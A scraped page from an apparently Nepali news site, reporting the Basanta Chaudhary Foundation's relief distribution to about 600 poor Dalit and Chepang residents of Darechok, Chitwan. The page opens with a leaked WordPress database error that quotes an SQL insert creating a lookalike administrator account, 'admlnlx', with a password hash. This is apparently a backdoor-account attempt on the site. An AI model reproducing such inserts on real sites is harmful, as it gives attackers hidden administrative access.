WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXAvMM72iPTgkjrShU3U/P5LQrT4Pd.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 09:34:20', '', 'admlnlx', 'admlnlx')
चितवन, माघ २७–
चितवनको दारेचोकमा बिहिबार ठूलो परिमाणमा राहत सामाग्री वितरण गरिएको छ । बसन्त चौधरी फाउण्डेसनले दारेचोक गाविस भित्र रहेका ६ सय विपन्न दलित र चेपाङलाई कपडा, त्रिपाल र खिचडी वितरण गरेको हो ।
राहात वितरण कार्यक्रमा बोल्दै फाउण्डेसनका महासचिव रत्नराज पाण्डेले संस्थाले दारेचोकमा पहिलो पटक राहात वितरण गरेको बताउदैँ आगामि दिनहरुमा पनि आवश्यकता महशुस भए जुनुसुकै बेला सहयोग गर्न संस्था तयार रहेको बताए । फाउण्डेसनले देशका विभिन्न स्थानमा पनि राहात वितरण गर्दै आएको उनले जानकारी दिए ।

कार्यक्रममा गाविस सचिव निलकण्ठ लामिछानेले गाविस भित्र रहेका दिनदुखीहरुको सहयोगका लागि गाविसले सहयोग गर्न चाहने संस्थाहरुलाई खुल्ला गरिएको भन्दै सबैसंग सहकार्य गरिरहेको बताए । सचिव लामिछानेले फाउण्डेसनलाई धन्यावाद दिए ।
दारेचोक वरेकका शान्ति माया चेपाङले आफुसंग शरीरमा लगाएको बाहेक फेर्ने कपडा नभएको बताउदैं कपडा पाउँदा खुशी भएको बताइन् । स्थानीय कृष्ण सिलवाल र कुमार श्रेष्ठको विशेष पहलमा फाउण्डेसनले राहत उपलब्ध गराएको हो ।
राहात वितरण कार्यक्रममा उद्योग वाणिज्य संघ मुग्लिनका अध्यक्ष कल्याण गुभाजु, स्थानीय संचारकर्मी लगायतको सहभागिता रहेको थियो । त्रिवेणी युवा क्लब र उद्योग वाणिज्य संघ मुग्लिनको संयोजनमा बसन्त चौधरी फाउण्डेसनले राहत वितरण गरेको हो । त्रिवेणी युवा क्लबका अध्यक्ष मुक्ति कुमार श्रेष्ठको अध्यक्षतामा राहत वितरण कार्यक्रम सम्पन्न भएको हो ।